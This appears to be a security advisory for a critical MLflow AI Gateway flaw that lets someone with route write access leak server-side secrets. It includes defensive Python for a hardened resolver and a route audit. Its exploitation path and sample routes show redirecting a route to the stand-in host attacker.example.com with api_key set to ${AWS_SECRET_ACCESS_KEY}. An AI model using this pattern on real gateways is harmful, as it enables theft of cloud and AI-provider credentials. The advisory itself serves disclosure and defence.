CVE-2026-4035: MLflow AI Gateway Credential Exfiltration
A critical credential exfiltration vulnerability tracked as CVE-2026-4035 has been disclosed in MLflow's AI Gateway component. Carrying a CVSS v3.1 score of 9.1 (Critical), the flaw enables a remote attacker to extract sensitive server-side environment variables — including API keys for AI provider services such as OpenAI, Anthropic, and Azure OpenAI — by exploiting improper resolution of environment variables within the api_key configuration field of AI Gateway routes.
The vulnerability affects all mlflow/mlflow versions prior to 3.11.0 and was published on June 3, 2026.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-4035 |
| CVSS Score | 9.1 (Critical) |
| CWE Classification | CWE-200 — Exposure of Sensitive Information to an Unauthorized Actor |
| Affected Component | MLflow AI Gateway — route api_key configuration |
| Attack Vector | Network |
| Authentication Required | Low (route access) |
| Primary Impact | Exfiltration of server-side AI provider credentials |
| Fixed Version | mlflow 3.11.0 |
| Source | NVD / NIST |
Technical Details
Root Cause
MLflow's AI Gateway allows administrators to define routes with backend AI provider credentials. When configuring a route, the api_key field supports environment variable substitution syntax (e.g., ${OPENAI_API_KEY}) to avoid embedding secrets directly in configuration files.
The vulnerability arises because this environment variable resolution is performed at request time rather than at server startup, and the resolved value can be reflected or forwarded to an attacker-controlled endpoint if the route is configured to proxy requests to an external URL.
An attacker with sufficient access to configure or modify an AI Gateway route can:
- Set the route's target endpoint to an attacker-controlled server
- Configure api_key to reference sensitive environment variables (e.g., ${DATABASE_URL}, ${AWS_SECRET_ACCESS_KEY})
- Trigger a request through the route
- Receive the resolved credential value at their controlled server via the forwarded Authorization header
Exploitation Path
Attacker (with AI Gateway route write access)
→ Create/modify route: endpoint = attacker.example.com
→ Set api_key = "${AWS_SECRET_ACCESS_KEY}"
→ Trigger request through the route
→ MLflow resolves env var and injects into Authorization header
→ HTTP request forwarded to attacker.example.com
→ Attacker receives: Authorization: Bearer <actual AWS secret>
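To make the root cause concrete, the following added Python example (not MLflow's code and not the actual 3.11.0 patch) contrasts a resolver that expands any ${VAR} at request time and forwards the result to whatever endpoint the route names, with a hardened resolver that resolves once at config-load time, accepts only an allowlisted set of variable names, and refuses to attach the credential unless the upstream host is the provider's known API host. The route dicts, the environment values, the allowlist and the provider host map are all constructed for the example.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Matches ${VAR} references in a configuration value.
ENV_REF = re.compile(r"\$\{([A-Za-z_][A-Za-z0-9_]*)\}")

# Constructed stand-in for the process environment; real code would use os.environ.
FAKE_ENV = {
    "OPENAI_API_KEY": "sk-constructed-openai-key",
    "AWS_SECRET_ACCESS_KEY": "constructed-aws-secret",
}

# Assumption for the example: a route may only reference provider API key
# variables, never arbitrary infrastructure secrets held in the environment.
ALLOWED_ENV_VARS = {"OPENAI_API_KEY", "ANTHROPIC_API_KEY", "AZURE_OPENAI_API_KEY"}

# Assumption: each provider has one known API host, and a route for that
# provider must not send the provider's key anywhere else.
PROVIDER_HOSTS = {
    "openai": "api.openai.com",
    "anthropic": "api.anthropic.com",
}


def resolve_unsafe(template, env=FAKE_ENV):
    """Request-time expansion of any ${VAR}: the behaviour the advisory describes."""
    return ENV_REF.sub(lambda m: env.get(m.group(1), ""), template)


def build_headers_unsafe(route, env=FAKE_ENV):
    """Whatever host the route names as its endpoint receives the resolved secret."""
    token = resolve_unsafe(route["api_key"], env)
    return route["endpoint"], {"Authorization": "Bearer " + token}


@dataclass(frozen=True)
class ResolvedRoute:
    name: str
    provider: str
    endpoint: str
    api_key: str


class RouteConfigError(ValueError):
    """Raised at load time, so a bad route never serves a request."""


def resolve_safe(route, env=FAKE_ENV):
    """Resolve once at config-load time with an allowlisted name and a pinned host."""
    name, provider = route["name"], route["provider"]
    endpoint, template = route["endpoint"], route["api_key"]

    refs = ENV_REF.findall(template)
    if refs:
        # Only a whole-value reference to a single allowlisted variable is accepted.
        if len(refs) != 1 or template != "${%s}" % refs[0]:
            raise RouteConfigError(f"{name}: api_key must be a single ${{VAR}} reference")
        var = refs[0]
        if var not in ALLOWED_ENV_VARS:
            raise RouteConfigError(f"{name}: {var} is not an allowed credential source")
        if var not in env:
            raise RouteConfigError(f"{name}: {var} is not set in the environment")
        secret = env[var]
    else:
        secret = template  # literal key in the config file (discouraged, but not a leak)

    # Pin the upstream host to the provider so the key cannot be redirected.
    host = urlparse(endpoint).hostname or ""
    expected = PROVIDER_HOSTS.get(provider)
    if expected is None or host != expected:
        raise RouteConfigError(f"{name}: endpoint host {host!r} is not the {provider} API host")
    return ResolvedRoute(name, provider, endpoint, secret)


if __name__ == "__main__":
    redirected = {"name": "leaky", "provider": "openai",
                  "endpoint": "https://attacker.example.com/v1",
                  "api_key": "${AWS_SECRET_ACCESS_KEY}"}
    print("unsafe resolver would send:", build_headers_unsafe(redirected))
    try:
        resolve_safe(redirected)
    except RouteConfigError as exc:
        print("safe resolver rejected route:", exc)
```

The hardened resolver fails closed at load time on both conditions the advisory combines: a variable name outside the provider-key allowlist and an endpoint host that is not the provider's own, so neither an infrastructure secret nor a legitimate provider key can be expanded into an Authorization header bound for an arbitrary host.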
The CVSS score of 9.1 reflects:
- Attack Vector: Network (remotely exploitable)
- Attack Complexity: Low (straightforward exploitation once route write access is obtained)
- Confidentiality Impact: High (full exposure of secrets stored as environment variables)
- Integrity/Availability Impact: Low-Moderate (credential theft enables downstream abuse)
Affected Configuration Pattern
A vulnerable AI Gateway configuration might look like:
```yaml
routes:
  - name: openai-proxy
    route_type: llm/v1/chat
    model:
      provider: openai
      name: gpt-4
      config:
        openai_api_key: "${OPENAI_API_KEY}"
        # Attacker could redirect this to a malicious endpoint
```

When the gateway processes a request, it resolves ${OPENAI_API_KEY} from the server environment and injects it into the upstream request. If the target endpoint is attacker-controlled, the credential is exfiltrated.
Impact Assessment
| Impact Area | Description |
|---|---|
| AI Provider Key Theft | OpenAI, Anthropic, Azure OpenAI, and other provider API keys exposed |
| Infrastructure Credentials | Any server-side env var accessible — AWS keys, database URLs, service tokens |
| Financial Impact | Stolen AI provider keys enable unauthorized usage at the victim's expense |
| Data Exfiltration | Broader env variable exposure may reveal database credentials and connection strings |
| Lateral Movement | Compromised cloud credentials enable pivoting into cloud infrastructure |
| Supply Chain Risk | MLflow is widely used in ML pipelines — downstream systems may be affected |
MLflow AI Gateway is commonly deployed in enterprise ML platforms, LLM orchestration pipelines, and AI application backends, meaning the blast radius of compromised credentials extends well beyond the MLflow deployment itself.
Affected Systems
| Product | Affected Versions | Fixed Version |
|---|---|---|
| mlflow/mlflow | All versions prior to 3.11.0 | 3.11.0 |
Organizations using MLflow AI Gateway in production — particularly those routing requests to commercial AI providers — should treat this as an urgent remediation priority.
Remediation
Immediate Actions
- Upgrade to MLflow 3.11.0 or later — The fix prevents environment variable resolution from being forwarded to externally-configured route endpoints:

  ```shell
  pip install --upgrade "mlflow>=3.11.0"
  # or with conda:
  conda install -c conda-forge "mlflow>=3.11.0"
  ```

- Audit AI Gateway route configurations — Review all configured routes for:
  - External or unexpected endpoint URLs
  - Use of environment variable expansion in api_key fields
  - Routes added without explicit authorization
- Rotate exposed credentials — If exploitation cannot be ruled out, rotate all environment variables that could have been accessed through AI Gateway routes, including:
  - AI provider API keys (OpenAI, Anthropic, Cohere, Azure OpenAI, etc.)
  - Cloud credentials stored as environment variables
  - Database connection strings
- Restrict AI Gateway route write access — Limit which users and service accounts can create or modify AI Gateway routes. Apply least-privilege access controls at the MLflow authentication layer.
- Monitor for anomalous route configurations — Implement audit logging for AI Gateway route changes and alert on unexpected external endpoints.
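The route audit and the alerting on unexpected endpoints called for above can be scripted. The following is an added example, not an MLflow utility: it walks a gateway routes document of the shape shown earlier and reports routes that are not on an approved list, endpoint-style config keys whose host is not one the provider is expected to use, and credential-style config keys that expand an environment variable, with a higher severity when that variable is not a provider key. The allowlists, the key-name conventions (suffixes such as api_key and api_base) and the sample routes document are constructed assumptions; a real run would load the gateway YAML through audit_file.

```python
import re
from urllib.parse import urlparse

ENV_REF = re.compile(r"\$\{([A-Za-z_][A-Za-z0-9_]*)\}")

# Assumptions for this example (not MLflow's own lists): hosts each provider is
# expected to talk to, env vars that may legitimately hold provider keys, and
# the config key suffixes that name a credential or an upstream endpoint.
EXPECTED_HOSTS = {"openai": {"api.openai.com"}, "anthropic": {"api.anthropic.com"}}
ALLOWED_KEY_VARS = {"OPENAI_API_KEY", "ANTHROPIC_API_KEY", "AZURE_OPENAI_API_KEY"}
CREDENTIAL_KEYS = ("api_key",)                      # e.g. openai_api_key
ENDPOINT_KEYS = ("api_base", "base_url", "endpoint")  # e.g. openai_api_base

# Constructed routes document: one expected route and one that exhibits the
# pattern the advisory describes (foreign host plus non-provider variable).
SAMPLE_ROUTES = {
    "routes": [
        {"name": "openai-proxy", "route_type": "llm/v1/chat",
         "model": {"provider": "openai", "name": "gpt-4",
                   "config": {"openai_api_key": "${OPENAI_API_KEY}",
                              "openai_api_base": "https://api.openai.com/v1"}}},
        {"name": "unreviewed-route", "route_type": "llm/v1/chat",
         "model": {"provider": "openai", "name": "gpt-4",
                   "config": {"openai_api_key": "${AWS_SECRET_ACCESS_KEY}",
                              "openai_api_base": "https://attacker.example.com/v1"}}},
    ]
}


def audit_routes(doc, approved_routes):
    """Return (route_name, severity, message) findings for a routes document."""
    findings = []
    for route in doc.get("routes", []):
        name = route.get("name", "<unnamed>")
        model = route.get("model", {})
        provider = model.get("provider", "")
        config = model.get("config", {})

        if name not in approved_routes:
            findings.append((name, "medium", "route is not in the approved route list"))

        for key, value in config.items():
            if not isinstance(value, str):
                continue
            if key.endswith(CREDENTIAL_KEYS):
                for var in ENV_REF.findall(value):
                    if var in ALLOWED_KEY_VARS:
                        findings.append((name, "low",
                                         f"{key} expands ${{{var}}}; review until the gateway "
                                         "runs 3.11.0 or later"))
                    else:
                        findings.append((name, "high",
                                         f"{key} expands ${{{var}}}, which is not a provider "
                                         "key variable"))
            if key.endswith(ENDPOINT_KEYS):
                host = urlparse(value).hostname or ""
                if host not in EXPECTED_HOSTS.get(provider, set()):
                    findings.append((name, "high",
                                     f"{key} points at unexpected host {host!r} "
                                     f"for provider {provider!r}"))
    return findings


def audit_file(path, approved_routes):
    """Audit a gateway YAML file on disk (needs PyYAML; imported lazily)."""
    import yaml
    with open(path) as fh:
        return audit_routes(yaml.safe_load(fh), approved_routes)


if __name__ == "__main__":
    for route_name, severity, message in audit_routes(SAMPLE_ROUTES, {"openai-proxy"}):
        print(f"[{severity.upper():6}] {route_name}: {message}")
```

Running the audit from a scheduled job against the live gateway configuration, and diffing its output against the previous run, gives the change-alerting the monitoring step asks for without depending on the gateway's own logging.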
Defense-in-Depth for MLflow Deployments
Priority 1: Upgrade to mlflow 3.11.0 immediately
Priority 2: Rotate all AI provider API keys and cloud credentials
Priority 3: Audit route configurations for malicious or unexpected endpoints
Priority 4: Enable MLflow authentication and restrict route write permissions
Priority 5: Deploy network egress filtering to block unexpected outbound routes
Priority 6: Implement secret management (Vault, AWS Secrets Manager) instead of env vars
MLOps Security Context
AI Gateway components present a unique attack surface in MLOps pipelines because they act as credential brokers between applications and AI provider APIs. Unlike traditional web applications, these systems are often deployed with broad environment access and may have relaxed security assumptions rooted in internal-tool deployments.
As organizations scale AI infrastructure, misconfigured or exploited AI Gateways can become high-value targets for:
| Threat | Description |
|---|---|
| API Key Theft for Resale | Stolen AI provider keys traded on underground markets |
| Unauthorized AI Usage | Leveraging victim's keys for compute-heavy AI tasks |
| Cloud Credential Pivot | Env vars often include cloud credentials for infrastructure access |
| ML Pipeline Poisoning | Credential access may enable modification of training data or model artifacts |
The CISA AI Security Guidelines and OWASP LLM Top 10 both highlight credential management as a critical risk in AI/ML deployments.
Key Takeaways
- CVE-2026-4035 is a CVSS 9.1 critical flaw in MLflow AI Gateway enabling server-side environment variable exfiltration via attacker-controlled route endpoints
- All mlflow/mlflow versions prior to 3.11.0 are affected — upgrade immediately
- The vulnerability targets the api_key environment variable resolution mechanism used to inject credentials into proxied AI provider requests
- Organizations should rotate all AI provider keys and cloud credentials if exploitation cannot be ruled out
- Apply least-privilege access controls to AI Gateway route management to limit who can configure route endpoints